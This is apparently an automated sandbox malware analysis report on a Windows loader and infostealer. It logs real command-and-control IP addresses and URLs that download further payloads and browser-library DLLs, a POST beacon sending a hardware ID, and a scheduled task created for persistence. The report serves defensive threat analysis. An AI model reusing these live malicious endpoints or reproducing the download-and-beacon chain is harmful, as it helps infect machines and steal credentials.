                        Source: Joe Sandbox ViewIP Address: 77.91.77.81 77.91.77.81
                        Source: Joe Sandbox ViewIP Address: 85.28.47.4 85.28.47.4
                        Source: Joe Sandbox ViewASN Name: FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU
                        Source: Joe Sandbox ViewASN Name: GES-ASRU GES-ASRU
                        Source: Joe Sandbox ViewASN Name: FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.4
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.4
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.4
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.4
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.4
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.4
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.4
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.4
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.4
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.4
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.4
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.4
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.4
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.4
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.4
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.4
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.4
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.4
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.4
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.4
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.4
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.4
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.4
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.4
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.4
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.4
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.4
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.4
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.4
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.4
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.4
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.4
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.4
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.4
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.4
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.4
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.4
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.4
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.4
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.4
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.4
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.4
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.4
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.4
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.4
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.4
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.4
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.4
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.4
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.4
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 10_2_00DABD30 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,10_2_00DABD30
                        Source: global trafficHTTP traffic detected: GET /69934896f997d5bb/sqlite3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /69934896f997d5bb/freebl3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /69934896f997d5bb/mozglue.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /69934896f997d5bb/msvcp140.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /69934896f997d5bb/nss3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /69934896f997d5bb/softokn3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /69934896f997d5bb/vcruntime140.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /mine/amadka.exe HTTP/1.1Host: 77.91.77.81Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /stealc/random.exe HTTP/1.1Host: 77.91.77.81
                        Source: unknownHTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEHJKJEBGHJJKEBGIECAHost: 85.28.47.4Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 45 48 4a 4b 4a 45 42 47 48 4a 4a 4b 45 42 47 49 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 38 38 35 35 43 34 37 42 36 42 43 34 31 35 38 31 33 35 32 33 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 48 4a 4b 4a 45 42 47 48 4a 4a 4b 45 42 47 49 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6a 6f 6e 79 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 48 4a 4b 4a 45 42 47 48 4a 4a 4b 45 42 47 49 45 43 41 2d 2d 0d 0a Data Ascii: ------JEHJKJEBGHJJKEBGIECAContent-Disposition: form-data; name="hwid"E8855C47B6BC4158135236------JEHJKJEBGHJJKEBGIECAContent-Disposition: form-data; name="build"jony------JEHJKJEBGHJJKEBGIECA--
                        Source: file.exe, 00000000.00000002.2271135677.00000000008AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.81/cost/go.exe
                        Source: file.exe, 00000000.00000002.2271711490.0000000001038000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://77.91.77.81/cost/go.exe00
                        Source: file.exe, 00000000.00000002.2271711490.0000000001038000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://77.91.77.81/cost/go.exeAppData
                        Source: file.exe, 00000000.00000002.2271135677.00000000008AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.81/mine/amadka.exe
                        Source: file.exe, 00000000.00000002.2271711490.0000000001038000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://77.91.77.81/mine/amadka.exe-Disposition:
                        Source: file.exe, 00000000.00000002.2271711490.0000000001038000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://77.91.77.81/mine/amadka.exe00
                        Source: explorti.exe, 0000000A.00000002.4563238492.00000000013A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.81/stealc/random.exe
                        Source: explorti.exe, 0000000A.00000002.4563238492.00000000013A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.81/stealc/random.exe50673b5d7%
                        Source: explorti.exe, 0000000A.00000002.4563238492.00000000013B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.82/
                        Source: explorti.exe, 0000000A.00000002.4563238492.00000000013B1000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 0000000A.00000002.4563238492.0000000001372000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.82/Hun4Ko/index.php
                        Source: explorti.exe, 0000000A.00000002.4563238492.0000000001406000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.82/Hun4Ko/index.php#
                        Source: explorti.exe, 0000000A.00000002.4563238492.00000000013B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.82/Hun4Ko/index.php%H
                        Source: explorti.exe, 0000000A.00000002.4563238492.00000000013B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.82/Hun4Ko/index.php/Hn
                        Source: explorti.exe, 0000000A.00000002.4563238492.0000000001372000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpM
                        Source: explorti.exe, 0000000A.00000002.4563238492.00000000013B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpXo
                        Source: explorti.exe, 0000000A.00000002.4563238492.0000000001372000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.82/Hun4Ko/index.phps
                        Source: explorti.exe, 0000000A.00000002.4563238492.0000000001406000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpu
                        Source: file.exe, 00000000.00000002.2271135677.00000000008AE000.00000004.00000020.00020000.00000000.sdmp, a62ee169b8.exe, 0000000C.00000002.2396795251.0000000001BCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.4
                        Source: a62ee169b8.exe, 0000000C.00000002.2396795251.0000000001BE5000.00000004.00000020.00020000.00000000.sdmp, a62ee169b8.exe, 0000000C.00000002.2396795251.0000000001C1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.4/
                        Source: a62ee169b8.exe, 0000000C.00000002.2396795251.0000000001BE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.4/.
                        Source: file.exe, 00000000.00000002.2271135677.0000000000900000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.4/69934896f997d5bb/freebl3.dll
                        Source: file.exe, 00000000.00000002.2271135677.0000000000900000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.4/69934896f997d5bb/mozglue.dll
                        Source: file.exe, 00000000.00000002.2271135677.0000000000900000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.4/69934896f997d5bb/mozglue.dlle
                        Source: file.exe, 00000000.00000002.2271135677.0000000000900000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.4/69934896f997d5bb/msvcp140.dll
                        Source: file.exe, 00000000.00000002.2271135677.0000000000900000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.4/69934896f997d5bb/msvcp140.dllP
                        Source: file.exe, 00000000.00000002.2271135677.0000000000900000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.4/69934896f997d5bb/nss3.dll
                        Source: file.exe, 00000000.00000002.2271135677.0000000000900000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.4/69934896f997d5bb/nss3.dll%U
                        Source: file.exe, 00000000.00000002.2271135677.0000000000900000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.4/69934896f997d5bb/softokn3.dll
                        Source: file.exe, 00000000.00000002.2271135677.0000000000900000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.4/69934896f997d5bb/softokn3.dllY
                        Source: file.exe, 00000000.00000002.2271135677.0000000000900000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.4/69934896f997d5bb/sqlite3.dll
                        Source: file.exe, 00000000.00000002.2271135677.0000000000900000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.4/69934896f997d5bb/vcruntime140.dll
                        Source: file.exe, 00000000.00000002.2271135677.0000000000900000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.4/69934896f997d5bb/vcruntime140.dll_INF
                        Source: a62ee169b8.exe, 0000000C.00000002.2396795251.0000000001C1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.4/845-40f1-ac21-573d1d5ce43f
                        Source: a62ee169b8.exe, 0000000C.00000002.2396795251.0000000001C1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.4/920475a59bac849d.php
                        Source: a62ee169b8.exe, 0000000C.00000002.2396795251.0000000001BE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.4/920475a59bac849d.php%
                        Source: file.exe, 00000000.00000002.2271135677.00000000008AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.4/920475a59bac849d.php5
                        Source: a62ee169b8.exe, 0000000C.00000002.2396795251.0000000001BE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.4/920475a59bac849d.phpB6
                        Source: a62ee169b8.exe, 0000000C.00000002.2396795251.0000000001C1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.4/920475a59bac849d.php_
                        Source: file.exe, 00000000.00000002.2271135677.00000000008AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.4/920475a59bac849d.phpz
                        Source: a62ee169b8.exe, 0000000C.00000002.2396795251.0000000001C1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.4/EM32
                        Source: a62ee169b8.exe, 0000000C.00000002.2396795251.0000000001BE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.4/Z
                        Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                        Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                        Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                        Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                        Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                        Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                        Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                        Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                        Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                        Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                        Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                        Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                        Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
                        Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
                        Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://ocsp.digicert.com0
                        Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://ocsp.digicert.com0A
                        Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://ocsp.digicert.com0C
                        Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://ocsp.digicert.com0N
                        Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://ocsp.digicert.com0X
                        Source: file.exe, random[1].exe.10.dr, a62ee169b8.exe.10.drString found in binary or memory: http://pki-crl.symauth.com/ca_732b6ec148d290c0a071efd1dac8e288/LatestCRL.crl07
                        Source: file.exe, random[1].exe.10.dr, a62ee169b8.exe.10.drString found in binary or memory: http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsusersIncIEEERootCA.cr
                        Source: file.exe, random[1].exe.10.dr, a62ee169b8.exe.10.drString found in binary or memory: http://pki-ocsp.symauth.com0
                        Source: Amcache.hve.6.drString found in binary or memory: http://upx.sf.net
                        Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://www.digicert.com/CPS0
                        Source: file.exe, file.exe, 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                        Source: file.exe, 00000000.00000002.2293873912.000000001C9BE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2309899894.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.sqlite.org/copyright.html.
                        Source: HIEHDAFH.0.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                        Source: file.exe, 00000000.00000002.2271135677.0000000000A1F000.00000004.00000020.00020000.00000000.sdmp, IJKFHDBKFCAAECBFIDHJ.0.drString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
                        Source: file.exe, 00000000.00000002.2271135677.0000000000A1F000.00000004.00000020.00020000.00000000.sdmp, IJKFHDBKFCAAECBFIDHJ.0.drString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
                        Source: HIEHDAFH.0.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                        Source: file.exe, 00000000.00000002.2271135677.0000000000919000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ep
                        Source: file.exe, 00000000.00000002.2271135677.0000000000919000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.epnacl
                        Source: file.exe, 00000000.00000002.2271135677.0000000000919000.00000004.00000020.00020000.00000000.sdmp, HIEHDAFH.0.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                        Source: file.exe, 00000000.00000002.2271135677.0000000000919000.00000004.00000020.00020000.00000000.sdmp, HIEHDAFH.0.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                        Source: file.exe, 00000000.00000002.2271135677.0000000000A1F000.00000004.00000020.00020000.00000000.sdmp, IJKFHDBKFCAAECBFIDHJ.0.drString found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
                        Source: file.exe, 00000000.00000002.2271135677.0000000000A1F000.00000004.00000020.00020000.00000000.sdmp, IJKFHDBKFCAAECBFIDHJ.0.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                        Source: HIEHDAFH.0.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                        Source: HIEHDAFH.0.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                        Source: HIEHDAFH.0.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                        Source: IJKFHDBKFCAAECBFIDHJ.0.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                        Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: https://mozilla.org0/
                        Source: HJKKFIJKFCAKJJJKJKFIEBFIDG.0.drString found in binary or memory: https://support.mozilla.org
                        Source: HJKKFIJKFCAKJJJKJKFIEBFIDG.0.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                        Source: HJKKFIJKFCAKJJJKJKFIEBFIDG.0.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt
                        Source: file.exe, 00000000.00000002.2271135677.0000000000A1F000.00000004.00000020.00020000.00000000.sdmp, IJKFHDBKFCAAECBFIDHJ.0.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
                        Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: https://www.digicert.com/CPS0
                        Source: file.exe, 00000000.00000002.2271135677.0000000000919000.00000004.00000020.00020000.00000000.sdmp, HIEHDAFH.0.drString found in binary or memory: https://www.ecosia.org/newtab/
                        Source: HIEHDAFH.0.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                        Source: HJKKFIJKFCAKJJJKJKFIEBFIDG.0.drString found in binary or memory: https://www.mozilla.org
                        Source: HJKKFIJKFCAKJJJKJKFIEBFIDG.0.drString found in binary or memory: https://www.mozilla.org#
                        Source: file.exe, 00000000.00000002.2271711490.0000000001096000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2271711490.000000000113A000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/about/
                        Source: HJKKFIJKFCAKJJJKJKFIEBFIDG.0.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
                        Source: file.exe, 00000000.00000002.2271711490.0000000001096000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/about/t.exe
                        Source: file.exe, 00000000.00000002.2271711490.0000000001096000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2271711490.000000000113A000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                        Source: HJKKFIJKFCAKJJJKJKFIEBFIDG.0.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
                        Source: file.exe, 00000000.00000002.2271711490.0000000001096000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/contribute/vchost.exe
                        Source: HJKKFIJKFCAKJJJKJKFIEBFIDG.0.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                        Source: file.exe, 00000000.00000002.2271135677.0000000000A1F000.00000004.00000020.00020000.00000000.sdmp, IJKFHDBKFCAAECBFIDHJ.0.drString found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_

                        System Summary

                        barindex
                        Source: HCGCBFHCFC.exe.0.drStatic PE information: section name:
                        Source: HCGCBFHCFC.exe.0.drStatic PE information: section name: .idata
                        Source: HCGCBFHCFC.exe.0.drStatic PE information: section name:
                        Source: amadka[1].exe.0.drStatic PE information: section name:
                        Source: amadka[1].exe.0.drStatic PE information: section name: .idata
                        Source: amadka[1].exe.0.drStatic PE information: section name:
                        Source: explorti.exe.8.drStatic PE information: section name:
                        Source: explorti.exe.8.drStatic PE information: section name: .idata
                        Source: explorti.exe.8.drStatic PE information: section name:
                        Source: file.exeStatic PE information: section name:
                        Source: file.exeStatic PE information: section name:
                        Source: file.exeStatic PE information: section name:
                        Source: file.exeStatic PE information: section name:
                        Source: file.exeStatic PE information: section name:
                        Source: random[1].exe.10.drStatic PE information: section name:
                        Source: random[1].exe.10.drStatic PE information: section name:
                        Source: random[1].exe.10.drStatic PE information: section name:
                        Source: random[1].exe.10.drStatic PE information: section name:
                        Source: random[1].exe.10.drStatic PE information: section name:
                        Source: a62ee169b8.exe.10.drStatic PE information: section name:
                        Source: a62ee169b8.exe.10.drStatic PE information: section name:
                        Source: a62ee169b8.exe.10.drStatic PE information: section name:
                        Source: a62ee169b8.exe.10.drStatic PE information: section name:
                        Source: a62ee169b8.exe.10.drStatic PE information: section name:
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess Stats: CPU usage > 49%
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA1B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,0_2_6CA1B700
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA1B8C0 rand_s,NtQueryVirtualMemory,0_2_6CA1B8C0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA1B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,0_2_6CA1B910
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9BF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,0_2_6C9BF280
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeFile created: C:\Windows\Tasks\explorti.jobJump to behavior
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9B35A00_2_6C9B35A0
